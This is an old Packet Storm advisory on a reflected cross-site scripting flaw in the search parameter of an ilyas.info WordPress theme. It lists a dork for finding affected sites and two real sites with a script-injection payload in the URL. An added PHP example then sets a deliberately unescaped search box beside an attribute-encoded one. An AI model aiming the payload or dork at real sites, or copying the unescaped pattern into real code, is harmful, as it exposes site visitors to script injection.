Ilyas.info Design Cross Site Scripting

2011-11-03T00:00:00
ID PACKETSTORM:106558
Type packetstorm
Reporter 3spi0n
Modified 2011-11-03T00:00:00

Description

                                        
`# Exploit Title: Ilyas.info Design Cross Site Scripting Vulnerability [WordPress Themes]  
# Date: 30/10/2011 - 23:00  
# Author: 3spi0n  
# Software Website: http://ilyas.info/  
# Tested On: BackTrack 5 - Win7 Ultimate  
# Platform: Php  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
[$] Vulnerable File: ?s=  
  
[$] Dorks: "Theme by Dizayn ilyas.info"  
  
[$] Demo Sites:  
  
[~] http://www.elektrikdelisi.com/?s="><script>alert("3spi0n")</script> [XSS]  
[~] http://www.degirmenmakinalari.com/?s="><script>alert("3spi0n")</script> [XSS]  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
# We attempted to work, you can not imagine.  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
# Contact: Http://3spi0n.Net/  
  
# Greetz: Http://DarkDevilz.in/  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
Mr.PaPaRoSSe Black_Umo ALEXTRAX Brs_BaRoN ZyX x-Leader  
Legend Coder DARKCOD3R Santiq0 53rh4t PerS ExDeaTH  
  
[And DD'z Family]  
  
[DarkDevilz - Defence And Destruction Group'z - TURKEY]  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
`
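
The `">` at the start of the search term in the demo URLs closes an attribute value and its tag, which is what happens when a theme writes `?s=` unencoded into the search box. The PHP below is an added example, not the theme's code (the advisory does not show it): the function names are hypothetical and the vulnerable form is an assumed reconstruction, placed beside the attribute-encoded output a theme should emit.

```php
<?php
// Added example. Assumption: the theme echoes the ?s= value into value="...".

// Vulnerable pattern: the raw request value lands inside the attribute.
function search_form_vulnerable(string $s): string
{
    return '<input type="text" name="s" value="' . $s . '">';
}

// Hardened pattern: encode for the HTML attribute context. ENT_QUOTES covers
// both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8 instead of
// returning an empty string. Inside a WordPress theme, esc_attr() or
// get_search_query() (escaped by default) serves the same purpose.
function search_form_hardened(string $s): string
{
    $safe = htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="s" value="' . $safe . '">';
}

// Check helper: parse a fragment and count the <script> elements it creates.
function count_script_elements(string $html): int
{
    $doc = new DOMDocument();
    // Fragments trigger libxml warnings; they are irrelevant to the count.
    @$doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    return $doc->getElementsByTagName('script')->length;
}

// Constructed input: the search term used in the advisory's demo URLs.
$term = '"><script>alert("3spi0n")</script>';

foreach (['vulnerable' => 'search_form_vulnerable',
          'hardened'   => 'search_form_hardened'] as $label => $render) {
    $html = $render($term);
    printf("%-10s script elements: %d\n           %s\n",
           $label, count_script_elements($html), $html);
}
```

Run it with the PHP CLI (the DOM extension is required for the check helper) to compare the two renderings of the same search term.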